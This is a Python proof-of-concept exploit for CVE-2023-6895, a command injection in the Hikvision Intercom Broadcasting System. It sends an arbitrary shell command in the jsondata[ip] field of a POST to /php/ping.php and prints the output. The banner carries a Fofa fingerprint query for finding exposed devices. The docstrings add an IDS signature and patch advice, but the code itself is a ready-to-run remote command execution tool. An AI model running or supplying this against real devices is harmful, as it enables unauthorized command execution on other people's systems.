import argparse
import requests
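def get_args():
    """Parse the command-line options of the proof-of-concept script.

    Returns:
        argparse.Namespace with ``url`` (base URL of the device under test)
        and ``cmd`` (text placed in the request, ``"id"`` when not given).

    ``--url`` is required: without it ``url`` would be ``None`` and the
    string concatenation in ``Exploit`` would fail with a ``TypeError``
    traceback instead of a usage message.
    """
    parser = argparse.ArgumentParser(
        prog="CVE-2023-6895.py",
        # Widen the help column so the long option help stays on one line.
        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
    )
    parser.add_argument(
        "-u",
        "--url",
        required=True,
        help="URL of target site (ex: http://target.com)",
    )
    parser.add_argument(
        "-c",
        "--cmd",
        default="id",
        help="Command to execute (default = id)",
    )
    return parser.parse_args()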
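def Exploit(url, cmd):
    """Send the CVE-2023-6895 proof-of-concept request and print the reply.

    POSTs a form body to ``<url>/php/ping.php`` in which the
    ``jsondata[ip]`` field carries *cmd* instead of an address, then prints
    the response body.

    Defender notes, derived from the request built below:
      * Log/IDS signature: a POST to ``/php/ping.php`` whose body has
        ``jsondata[type]=3`` and a ``jsondata[ip]`` value that is not a
        plain IP address or hostname.
      * This script also sends a fixed Chrome 120 User-Agent together with
        ``Accept-Language: zh-CN``, ``Te: trailers`` and
        ``Connection: close``; these are trivially changed, so treat them
        as weak, secondary indicators.
      * Presumably the endpoint hands the ``ip`` field to a shell command;
        the server-side handling is not visible here. The durable fixes
        are the vendor update for CVE-2023-6895 and keeping the device's
        web interface off untrusted networks.

    Args:
        url: Base URL of the device under test, without a trailing path.
        cmd: Text appended verbatim as the ``jsondata[ip]`` value.

    Returns:
        None. The outcome is printed.
    """
    # Pre-encoded form body: jsondata[type]=3&jsondata[ip]=<cmd>
    cmd = "jsondata%5Btype%5D=3&jsondata%5Bip%5D=" + cmd
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'Pragma': 'no-cache',
        'Upgrade-Insecure-Requests': '1',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Sec-Fetch-Dest': 'document',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-Site': 'none',
        'Sec-Fetch-User': '?1',
        'Te': 'trailers',
        'Connection': 'close'
    }
    expurl = url + '/php/ping.php'
    # verify=False below turns off TLS certificate validation; this call
    # only silences the warning urllib3 would print about that.
    requests.packages.urllib3.disable_warnings()
    try:
        req = requests.post(expurl, data=cmd, headers=headers, timeout=10, verify=False)
        # The reply is run through unicode_escape so \uXXXX sequences in
        # the body are shown as characters.
        data = str(req.text.encode('utf-8').decode('unicode_escape'))
        print("目标:" + url + "结果:" + data)
    except (requests.RequestException, UnicodeError) as exc:
        # The original bare `except: pass` hid every failure (and swallowed
        # Ctrl-C); report connection and decoding errors instead.
        print("request to " + expurl + " failed: " + str(exc))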
def main():
    """Print the banner, parse the command line and run the single check.

    The banner names the affected product build, the CVE identifier, the
    author and a favicon-hash fingerprint query; asset owners can use the
    same fingerprint to inventory their own exposed units.
    """
    rule = '==================================================================================='
    banner = (
        rule,
        '| Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) |',
        '| CVE-2023-6895 |',
        '| by FuBoLuSEC |',
        '| Fofa:icon_hash="-1830859634" |',
        rule + '\n',  # closing rule is followed by one blank line
    )
    print()
    for line in banner:
        print(line)

    options = get_args()
    # Surrounding whitespace is trimmed from the command text before sending.
    Exploit(options.url, options.cmd.strip())
# Run the proof-of-concept only when executed as a script, not on import.
if __name__ == "__main__":
    main()